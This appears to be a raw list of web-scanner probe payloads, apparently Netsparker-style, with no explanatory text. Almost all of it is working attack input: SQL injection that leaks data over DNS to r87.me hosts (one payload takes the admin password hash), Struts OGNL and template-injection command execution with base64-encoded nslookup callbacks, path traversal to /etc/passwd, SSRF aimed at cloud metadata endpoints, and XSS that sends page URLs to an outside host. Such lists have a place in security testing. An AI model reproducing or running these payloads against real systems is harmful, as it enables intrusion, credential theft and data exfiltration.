'+((SELECT 1 FROM (SELECT SLEEP(25))A))+' /* 6f42088e-ebca-4f39-9592-6cf61ad4cdc4 */
3
/../../../../../../../../../../windows/win.ini
3
'{${print(int)0xFFF9999-74316}}'
declare @h varchar(999)select @h='1'+substring(name+'-'+master.sys.fn_varbintohexstr(ISNULL(password_hash,0x0)),0,63)+'.euwnqj-pmxpypwt2moq54gitllbtixor2rehf9py'+'_wc.r87.me' from sys.sql_logins WHERE principal_id=1;exec('xp_dirtree ''\\'+@h+'\c$''')
'+((SELECT 1 FROM (SELECT SLEEP(25))A))+' /* 68e7c921-5f3d-442e-8c28-4404fa126c48 */
file:///windows/win.ini
3
[php]print(int)0xFFF9999-22743;[/php]
3
-1' or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+' /* d145cc54-663f-4401-81e2-108a789bbcdb */
1;exec('xp_dirtree ''\\euwnqj-pmxdxildghscgso0nbfkeabpaoxxdxadx'+'wnw.r87.me'+'\c$\a''')--
[php]print(int)0xFFF9999-41283;[/php]
3
http://45.114.117.227:8000/trace.axd
/../../../../../../../../../../windows/win.ini.php
-1' or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+' /* f0a00360-2084-47dd-b8a7-7cf43f24334f */
-1';exec('xp_dirtree ''\\euwnqj-pmx1gpjt8uxemfl1dtq25i-oslxza-hke'+'qoe.r87.me'+'\c$\a''')--
%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='36467').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c','SET /A 0xFFF9999 -' + #cmd}:{'/bin/bash','-c','expr 268409241 - ' + #cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
c:\windows\win.ini
3
-1 or 1=((SELECT 1 FROM (SELECT SLEEP(25))A)) /* a8600c11-194a-4b32-9ef3-c9264475253a */
print localtime()*0+0xFFF9999-64769
1) exec('xp_dirtree ''\\euwnqj-pmxmrryblpwcy0hh0m1gqmpxf-vfrwfue'+'lty.r87.me'+'\c$\a''')--
45.114.117.227:8000/trace.axd
3
...//...//...//...//...//...//...//...//...//...//...//windows/win.ini
3
-1 or 1=((SELECT 1 FROM (SELECT SLEEP(25))A)) /* dc8b5a5c-ad2f-44e2-8551-18a0af063823 */
1')exec('xp_dirtree ''\\euwnqj-pmxyevexm5vbmohaeaebbfglierfmyrxc'+'3rc.r87.me'+'\c$\a''')--
3
3
3
-1" or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+" /* d09fc1d0-d587-4111-91bb-9182af666299 */
....//....//....//....//....//....//....//....//....//....//....//windows/win.ini
3
1))exec('xp_dirtree ''\\euwnqj-pmx2d4x8la40suiavvzy9gwtrbnndrpij'+'geu.r87.me'+'\c$\a''')--
45.114.117.227/trace.axd
3
3
-1" or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+" /* 0060e61f-cd7a-4351-8cd1-214a9abbd93b */
.....///.....///.....///.....///.....///.....///.....///.....///.....///.....///.....///windows/win.ini
1'))exec('xp_dirtree ''\\euwnqj-pmxncq7qeekuzdj7mo0l9hq_3i5tdm20_'+'fqq.r87.me'+'\c$\a''')--
3
print localtime()*0+0xFFF9999-86992
127.100.11.2/trace.axd
syscolumns WHERE 2>3;exec('xp_dirtree ''\\euwnqj-pmxdhxnvjbyj8jfkam85qrcikxkhjqmq7'+'jsk.r87.me'+'\c$\a''')--
. . /. . /. . /. . /. . /. . /. . /. . /. . /. . /. . /windows/win.ini
') AND (SELECT 1 FROM (SELECT(SLEEP(25)))A)-- 1 /* 9486b590-7bbb-4e06-ab50-9976765beddd */
3
eval('print localtime()*0+0xFFF9999-63600')
127.0.0.1/trace.axd
/../../../../../../../../../../windows/iis6.log
') AND (SELECT 1 FROM (SELECT(SLEEP(25)))A)-- 1 /* 56bb6a5c-3f20-4925-9ac9-865a2c9c2f32 */
3
DECLARE @q varchar(999),@r nvarchar(999)SET @q = 'SELECT * FROM OPENROWSET(''SQLOLEDB'',''@'';''a'';''1'',''SELECT 1'')'SET @r=replace(@q,'@','euwnqj-pmxgh8bq1d_zzn7hpk4u7j7psyo0dwrlp'+'rg4.r87.me')exec sp_executesql @r
eval('print localtime()*0+0xFFF9999-33765')
[::1]/trace.axd
/../../../../../../../../../../proc/self/fd/2
'+print localtime()*0+0xFFF9999-39888+'
' AND (SELECT 1 FROM (SELECT(SLEEP(25)))A)-- 1 /* c5a8ebd4-1e18-4f14-a7e9-cb63f5173e51 */
3
http://45.114.117.227:8000/elmah.axd
1;DECLARE @q varchar(999),@r nvarchar(999)SET @q = 'SELECT * FROM OPENROWSET(''SQLOLEDB'',''@'';''a'';''1'',''SELECT 1'')'SET @r=replace(@q,'@','euwnqj-pmxlvhhjac1fz_-2bqka_vwsaigd28ryf'+'nue.r87.me')exec sp_executesql @r--
/../../../../../../../../../../proc/self/fd/2.php
'+print localtime()*0+0xFFF9999-62606+'
3
' AND (SELECT 1 FROM (SELECT(SLEEP(25)))A)-- 1 /* 45f9e052-c020-4761-85b3-5b0ba8d2cac0 */
45.114.117.227:8000/elmah.axd
-1';DECLARE @q varchar(999),@r nvarchar(999)SET @q = 'SELECT * FROM OPENROWSET(''SQLOLEDB'',''@'';''a'';''1'',''SELECT 1'')'SET @r=replace(@q,'@','euwnqj-pmxp8ott3fexe5od6uye4c7e3gr8i4c4g'+'gns.r87.me')exec sp_executesql @r--
/../../../../../../../../../../etc/httpd/logs/error.log
"+print localtime()*0+0xFFF9999-88747+"
3
45.114.117.227/elmah.axd
3
SELECT dblink_connect('host=euwnqj-pmxnqybu2xmswj0szmldzf-msk_5w6cqk'||'rm0.r87.me user=a password=a connect_timeout=2')
'XOR(if(now()=sysdate(),sleep(25),0))XOR'NS /* dbb0179e-5511-4929-b612-259744297c7b */
"+print localtime()*0+0xFFF9999-34090+"
/../../../../../../../../../../etc/httpd/logs/error_log
127.100.11.2/elmah.axd
dblink_connect('host=euwnqj-pmx2bopx8w5wbolkwsrlfys7zunrpqswt'||'abo.r87.me user=a password=a connect_timeout=2')
3
'XOR(if(now()=sysdate(),sleep(25),0))XOR'NS /* 118e7abf-08a6-41d5-bdfe-1ea5245b009f */
arguments[1].end(require('child_process').execSync('expr 268409241 - 46407'))
127.0.0.1/elmah.axd
/../../../../../../../../../../var/log/apache2/error.log
3
arguments[1].end(require('child_process').execSync('expr 268409241 - 85203'))
[::1]/elmah.axd
3
/../../../../../../../../../../var/log/apache/error.log
arguments[1].end(require('child_process').execSync('set /A 268409241 - 81451'))
http://45.114.117.227:8000/elmah
3
/../../../../../../../../../../proc/version
arguments[1].end(require('child_process').execSync('set /A 268409241 - 51719'))
cast((SELECT dblink_connect('host=euwnqj-pmx_img9c94_o2fij1iluxtoqwyk87npc'||'hja.r87.me user=a password=a connect_timeout=2')) as numeric)
3
45.114.117.227:8000/elmah
%{#context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"].addHeader("a",268409241-24735)}
3
cast((SELECT dblink_connect(chr(104)||chr(111)||chr(115)||chr(116)||chr(61)||chr(101)||chr(117)||chr(119)||chr(110)||chr(113)||chr(106)||chr(45)||chr(112)||chr(109)||chr(120)||chr(49)||chr(105)||chr(49)||chr(113)||chr(106)||chr(102)||chr(112)||chr(101)||chr(100)||chr(110)||chr(111)||chr(116)||chr(107)||chr(49)||chr(110)||chr(115)||chr(109)||chr(50)||chr(48)||chr(119)||chr(49)||chr(100)||chr(114)||chr(111)||chr(118)||chr(100)||chr(116)||chr(111)||chr(114)||chr(122)||chr(52)||chr(100)||chr(117)||chr(46)||chr(114)||chr(56)||chr(55)||chr(46)||chr(109)||chr(101)||chr(32)||chr(117)||chr(115)||chr(101)||chr(114)||chr(61)||chr(97)||chr(32)||chr(112)||chr(97)||chr(115)||chr(115)||chr(119)||chr(111)||chr(114)||chr(100)||chr(61)||chr(97)||chr(32)||chr(99)||chr(111)||chr(110)||chr(110)||chr(101)||chr(99)||chr(116)||chr(95)||chr(116)||chr(105)||chr(109)||chr(101)||chr(111)||chr(117)||chr(116)||chr(61)||chr(50))) as numeric)
45.114.117.227/elmah
3
'||(SELECT dblink_connect('host=euwnqj-pmxqaw-x6xqtj_xa1djapgfd7ltulcmdp'||'iem.r87.me user=a password=a connect_timeout=2'))||'
/../../../../../../../../../../proc/version.php
%{#context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"].addHeader("a",268409241-16523)}
3
127.100.11.2/elmah
/../../../../../../../../../../../etc/passwd
(select UTL_INADDR.GET_HOST_ADDRESS('euwnqj-pmxldulv8gnjnauos5dzqchq3j3rts_k3'||'u3o.r87.me') from DUAL)
p "#{0xFFF9999.to_i-`echo 81857`.to_i}"
3
/../../../../../../../../../../../etc/passwd
(length(CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS('euwnqj-pmxrw3drwwp0ilhqek6ffgtt49lrb8sw3'||'j80.r87.me') from DUAL))))
3
p "#{0xFFF9999.to_i-`echo 21558`.to_i}"
127.0.0.1/elmah
file:///etc/passwd
3
'||CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS('euwnqj-pmxlzn7hdt0nvv8fxkqjkytixzqr9qwo8'||'xla.r87.me') from DUAL))||'
__import__('os').popen(('expr 268409241 - {0}').format('64678')).read()
/../../../../../../../../../../../etc/passwd
(select UTL_INADDR.GET_HOST_ADDRESS(chr(101)||chr(117)||chr(119)||chr(110)||chr(113)||chr(106)||chr(45)||chr(112)||chr(109)||chr(120)||chr(111)||chr(98)||chr(97)||chr(57)||chr(121)||chr(104)||chr(121)||chr(104)||chr(114)||chr(112)||chr(50)||chr(105)||chr(105)||chr(49)||chr(118)||chr(49)||chr(98)||chr(52)||chr(54)||chr(119)||chr(104)||chr(101)||chr(105)||chr(49)||chr(121)||chr(103)||chr(104)||chr(118)||chr(122)||chr(117)||chr(110)||chr(107)||chr(111)||chr(46)||chr(114)||chr(56)||chr(55)||chr(46)||chr(109)||chr(101)) from DUAL)
3
[::1]/elmah
__import__('os').popen(('expr 268409241 - {0}').format('92251')).read()
/../../../../../../../../../../../etc/passwd.php
3
__import__('os').popen(('SET /A 268409241 - {0}').format('33385')).read()
http://aws.r87.me/latest/meta-data/public-hostname
(length(CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS(chr(101)||chr(117)||chr(119)||chr(110)||chr(113)||chr(106)||chr(45)||chr(112)||chr(109)||chr(120)||chr(48)||chr(49)||chr(113)||chr(102)||chr(111)||chr(95)||chr(106)||chr(54)||chr(97)||chr(121)||chr(116)||chr(97)||chr(98)||chr(114)||chr(45)||chr(117)||chr(108)||chr(114)||chr(105)||chr(122)||chr(120)||chr(95)||chr(121)||chr(116)||chr(48)||chr(107)||chr(118)||chr(95)||chr(57)||chr(116)||chr(109)||chr(114)||chr(109)||chr(46)||chr(114)||chr(56)||chr(55)||chr(46)||chr(109)||chr(101)) from DUAL))))
__import__('os').popen(('SET /A 268409241 - {0}').format('40025')).read()
http://169.254.169.254/latest/meta-data/public-hostname
...//...//...//...//...//...//...//...//...//...//...//etc/passwd
gethostbyname(trim('euwnqj-pmxojvxnfngtsrr7wt6xnhbokwhgz0rl3'.'jpu.r87.me'))
'||CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS(chr(101)||chr(117)||chr(119)||chr(110)||chr(113)||chr(106)||chr(45)||chr(112)||chr(109)||chr(120)||chr(52)||chr(108)||chr(116)||chr(115)||chr(102)||chr(110)||chr(113)||chr(113)||chr(102)||chr(102)||chr(109)||chr(110)||chr(121)||chr(108)||chr(45)||chr(97)||chr(53)||chr(100)||chr(55)||chr(50)||chr(108)||chr(119)||chr(45)||chr(107)||chr(102)||chr(104)||chr(105)||chr(115)||chr(109)||chr(48)||chr(117)||chr(110)||chr(111)||chr(46)||chr(114)||chr(56)||chr(55)||chr(46)||chr(109)||chr(101)) from DUAL))||'
gethostbyname(trim('euwnqj-pmx6pdl2jxeuvg4w7zmfgwnsnkq0oj62s'.'5ui.r87.me'));
http://127.0.0.1:22
+gethostbyname(trim('euwnqj-pmx5nrh-pobcmjuiash4s46i5csybt3c8'.'0dq.r87.me'));//
....//....//....//....//....//....//....//....//....//....//....//etc/passwd
http://45.114.117.227:22
'+gethostbyname(trim('euwnqj-pmxq0kvf63b65nxja8-n419dspqca2p0w'.'6ze.r87.me'))+'
.....///.....///.....///.....///.....///.....///.....///.....///.....///.....///.....///etc/passwd
http://[::1]:22
"+gethostbyname(trim('euwnqj-pmxyi9lby7jybgv2xmwgyyvdypiiw-vfv'.'zua.r87.me'))+"
<? gethostbyname(trim('euwnqj-pmx6lflhgdtzkd1auxxhsrqcxqprymkon'.'qvq.r87.me'));//?>
. . /. . /. . /. . /. . /. . /. . /. . /. . /. . /. . /etc/passwd
http://127.0.0.1:3306
'{${gethostbyname(trim('euwnqj-pmxlrdtixhjxwi3dqwi_4gztefsnagwcb'.'srm.r87.me'))}}'
3/../../../../../../../../../../../etc/passwd
http://45.114.117.227:3306
createobject("WScript.Shell").exec("nslookup euwnqj-pmx_htbemlq0ee-pwlwpx2n4fym7veacx" & "dbe.r87.me").StdOut.ReadAll
/etc/passwd
http://[::1]:3306
+createobject("WScript.Shell").exec("nslookup euwnqj-pmxedfjukelzxwtem-f3h15f3l0ux0iyd" & "v_q.r87.me").StdOut.ReadAll
%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
http://45.114.117.227:8000/server-status
+createobject("WScript.Shell").exec("nslookup euwnqj-pmxzn1qak802ga4adu-xozjzlpufmlpmu" & "trq.r87.me").StdOut.ReadAll+
data:;base64,TlM3NzU0NTYxNDQ2NTc1
comments
<%createobject("WScript.Shell").exec("nslookup euwnqj-pmxqrjica-dcbduju8hzpie3im8wqbsuu" & "gky.r87.me").StdOut.ReadAll%>
http://169.254.169.254/opc/v1/instance
"+createobject("WScript.Shell").exec("nslookup euwnqj-pmxnzsmykh2wmrmbhxy-alquabgs9o0d-" & "uum.r87.me").StdOut.ReadAll+"
https://metadata.packet.net/metadata
comments
gethostbyname(lc 'euwnqj-pmxhhr-ha4a7pnxxlmvelzdoens0dlgy0'.'xsu.r87.me')
WEB-INF/web.xml
https://metadata.platformequinix.com/metadata
eval('gethostbyname(lc 'euwnqj-pmxnuw8vckafztr0ijk6bsdrqmzzp7y-p'.'1jy.r87.me')')
/../../../../../../../../../../WEB-INF/web.xml
'+gethostbyname(lc 'euwnqj-pmx6kg8q80tgenbfzejjqg46wm0s3ypsv'.'nte.r87.me')+'
"+gethostbyname(lc 'euwnqj-pmx79cbmnhcw_i7wtbcnm4wfp686l4s-c'.'wbu.r87.me')+"
/../../../../../../../../../../var/log/apache2/access.log
nslookup euwnqj-pmxgw8o3uyujwecse4yr09od0ro2hyfmc^484.r87.me&'\"`0&nslookup euwnqj-pmxgw8o3uyujwecse4yr09od0ro2hyfmc^484.r87.me&`'
/../../../../../../../../../../etc/httpd/logs/access.log
& nslookup euwnqj-pmx47p0suwtw5qnm1wwtxx_obpgtrxf-x^0xq.r87.me&'\"`0&nslookup euwnqj-pmx47p0suwtw5qnm1wwtxx_obpgtrxf-x^0xq.r87.me&`'
/../../../../../../../../../../var/log/nginx/access.log
'& nslookup euwnqj-pmxco6a2bbzvl6kuf9u7s3l9rhdr47jzt^j3s.r87.me&'\"`0&nslookup euwnqj-pmxco6a2bbzvl6kuf9u7s3l9rhdr47jzt^j3s.r87.me&`'
/../../../../../../../../../../opt/lampp/logs/access_log
"& nslookup euwnqj-pmxy10hj4qpjmcyoxmsexggwkomdg8uar^gf4.r87.me&'\"`0&nslookup euwnqj-pmxy10hj4qpjmcyoxmsexggwkomdg8uar^gf4.r87.me&`'
/../../../../../../../../../../var/log/lighttpd/access.log
nslookup "euwnqj-pmxmalhmsub_f5ogtkr_9gzm60fzbjwaw""khk.r87.me"
&nslookup "euwnqj-pmxrfh1ilm1r-o7fvjvuukjb2tz2oehjg""9e4.r87.me"
/../../../../../../../../../../AppServ/Apache24/logs/access.log
../../../../../../../../../../xampp/apache/logs/access.log
'&nslookup "euwnqj-pmxw_sbiiauhqlz5ol2febxzw4-5rbsvz""a0a.r87.me"
/../../../../../../../../../../var/log/apache/access.log
"&nslookup "euwnqj-pmxjvjsz71sntmoihcxahdglbx-isol65""c1s.r87.me"
|nslookup${IFS}"euwnqj-pmxhjnweun5me3dcalorockc2ekjc3jbz""tfi.r87.me"
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='nslookup `whoami`."euwnqj-pmxf4r5owtrzfavzamjvk1r_75wyute1l""vsi.r87.me"').(#p=new java.lang.ProcessBuilder({'/bin/bash','-c',#cmd})).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
3
%{(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='nslookup "euwnqj-pmxkrt3f1htvkkwh5vdys7l-lye3oblti"rj4.r87.me"').(#p=new java.lang.ProcessBuilder({'cmd.exe','/c',#cmd})).(#p.redirectErrorStream(true)).(#process=#p.start()).(@org.apache.commons.io.IOUtils@toString(#process.getInputStream()))}
{{__import__('os').popen(__import__('base64').urlsafe_b64decode('bnNsb29rdXAgZXV3bnFqLXBteGJ5eWl3ZnV1LW1pdHBsd2R5cHRnM2p3LW9rb3Zlb3dtdS5yODcubWU=')).read()}}
{% set d = "eval(__import__('base64').urlsafe_b64decode('X19pbXBvcnRfXygnb3MnKS5wb3BlbihfX2ltcG9ydF9fKCdiYXNlNjQnKS51cmxzYWZlX2I2NGRlY29kZSgnYm5Oc2IyOXJkWEFnWlhWM2JuRnFMWEJ0ZUhGbVpqUjVNWHBvWlcxemQyaGxkV1kyWW5oMlpqZHlPR0p3ZDJObWEyNW5jUzV5T0RjdWJXVT0nKSkucmVhZCgp'))" %}{% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__ == 'catch_warnings' %}{% for b in c.__init__.func_globals.values() %} {% if b.__class__ == {}.__class__ %}{% if 'eval' in b.keys() %}{{ b['eval'](d) }}{% endif %}{% endif %}{% endfor %}{% endif %}{% endfor %}
= global.process.mainModule.require('child_process').execSync(Buffer('bnNsb29rdXAgZXV3bnFqLXBteDVpcnd6bGU4ejV6dWpoMDUyZGo2eF9rc3phY21wbXNpZy5yODcubWU=','base64').toString())
<%- global.process.mainModule.require('child_process').execSync(Buffer('bnNsb29rdXAgZXV3bnFqLXBteGkzamptYmt3a3RndG1zNXpjNnZrczZjcHJxZngwcHZkMC5yODcubWU=','base64').toString()) %>
3
{php}Smarty_Resource::parseResourceName(system("nslookup euwnqj-pmxtmzdpf8qylq6omxvvbltou9emp_sdc"."a5c.r87.me"),'b');{/php}
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("nslookup euwnqj-pmxutdy3hv5kmldq6dhmmxcimliqrxd33"~"pxa.r87.me")}}
<%= "#{(require'base64';%x(#{Base64.urlsafe_decode64('bnNsb29rdXAgZXV3bnFqLXBteGZtcmZpM2NhMXNiLW9vM3Bzazh4cDlrZW93cHloandicS5yODcubWU=')})).to_s}" %>
<#assign ex="freemarker.template.utility.Execute"?new()>${ ex("bash -c {eval,$({tr,/+,_-}<<<bnNsb29rdXAgZXV3bnFqLXBteGMzdTNkeXhvMGFmdXNhNmkwN3M2NnFmd29zNmhyLXFlZy5yODcubWU=|{base64,--decode})}") }
<#assign ex="freemarker.template.utility.Execute"?new()>${ ex("cmd.exe /c nslookup euwnqj-pmx6jz47tic5xzbz9yutminiwwdxygy4r"+"_ys.r87.me") }
require 'resolv';Resolv.getaddress ("euwnqj-pmxb21sufmeiyqkxzk2e_kv4b0_kk97ty".concat "ig8.r87.me")
__import__('os').popen(__import__('base64').urlsafe_b64decode('bnNsb29rdXAgZXV3bnFqLXBteGJ5cGx5am1rLXh2Y2p1YjNkYXRoMm95ZWJ6eTlmOHItdS5yODcubWU=')).read()
require('dns').lookup('euwnqj-pmxdcnv7dziux0bna1dzvsdd0xshqjdwi'.concat('gzg.r87.me'),_=>_)
${script:javascript:java.lang.Runtime.getRuntime().exec('nslookup euwnqj-pmxbw3wmo_zumvhmashtedjjuf4xgjuac'+'v7q.r87.me')}
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
3
n3tsp4rke2
<scRipt>netsparker(0x004584)</scRipt>
3
3
'"--></style></scRipt><scRipt>netsparker(0x004589)</scRipt>
%27%22--%3E%3C%2Fstyle%3E%3C%2FscRipt%3E%3CscRipt%3Enetsparker%280x00458D%29%3C%2FscRipt%3E
%27%22--%3E%3C%2Fstyle%3E%3C%2FscRipt%3E%3CscRipt%3Enetsparker%280x00458E%29%3C%2FscRipt%3E
data:;base64,JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDA0NThGKTwvc2NyaXB0Pg==
data:;base64,JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDA0NTkwKTwvc2NyaXB0Pg==
'" ns=netsparker(0x004591)
1 ns=netsparker(0x004593)
'><net sparker=netsparker(0x00459D)>
"><net sparker=netsparker(0x00459F)>
<iMg src=N onerror=netsparker(0x0045A1)>
javascript:netsparker(0x0045A3)
<scRipt>ns(0x0045A5)</scRipt>
*/netsparker(0x0045A7);/*
'+netsparker(0x0045A9)+'
"+netsparker(0x0045AB)+"
\';netsparker(0x0045AD);///
',netsparker(0x0045AF),'
netsparker(0x0045B1)
netsparker(0x0045B3);
'+netsparker(0x0045B5)+'
'"@--></style></scRipt><scRipt>netsparker(0x0045B7)</scRipt>
%22%2bnetsparker(0x0045CD)%2b%22
<html xmlns="http://www.w3.org/1999/xhtml"><script>netsparker(0x0045D7)</script></html>
//r87.com/?0x0045D9
//r87.com/?0x0045DA
<a HrEf=JaVaScRiPt:netsparker(0x0045DB)>
ns@mail.ns'"/>()%26%25<ScRiPt >netsparker(0x0045DD)</ScRiPt>
Content-Type:text/html <scRipt>ns(0x0045DF)</scRipt>
<frame src="javascript:netsparker('netsparker(0x0045E1)')"></frame>
<scr<script>ipt>netsparker(0x0045E3)</scr</script>ipt>
<iframe src="javascript:ns(0x0045E5)"></iframe>
"><x oncut=ns(450)>
"><x oncut=ns(830)>
//r87.com/n/j/?0x0045E7
//r87.com/n/j/?0x0045E8
\";netsparker(0x0045E9);///
'"--></style></scRipt><scRipt>netsparker(0x0045ED)</scRipt>
3
3
3
3
'"--></style></scRipt><scRipt>netsparker(0x0045EE)</scRipt>
3
3
3
3
3
3
3
3
3
3
3
3
3
3
'"--></style></scRipt><scRipt src="//euwnqj-pmxkz3cg4z5fgprzq-giknmdpy-fmjfwj6ck.r87.me"></scRipt>
3
3
<iMg src=N onerror="this.onerror='';this.src='//euwnqj-pmxtho-rcgdmmzf5im_m00ahfmjwk3usa'+'_9w.r87.me/r/?'+location.href">
3
3
3
<iMg src="//r87.me/images/1.jpg" onload="this.onload='';this.src='//euwnqj-pmx1lgja_ywesjjb6co3aqqkel4d0hwth'+'ezm.r87.me/r/?'+location.href">
3
3
3
3
3
<fRame src=N onload="this.onload='';this.src='//euwnqj-pmxmp9agziasdzqcopw31kl5sqdfojy-z'+'blq.r87.me/r/?'+location.href">
3
3
Test
<script>alert(1)</script>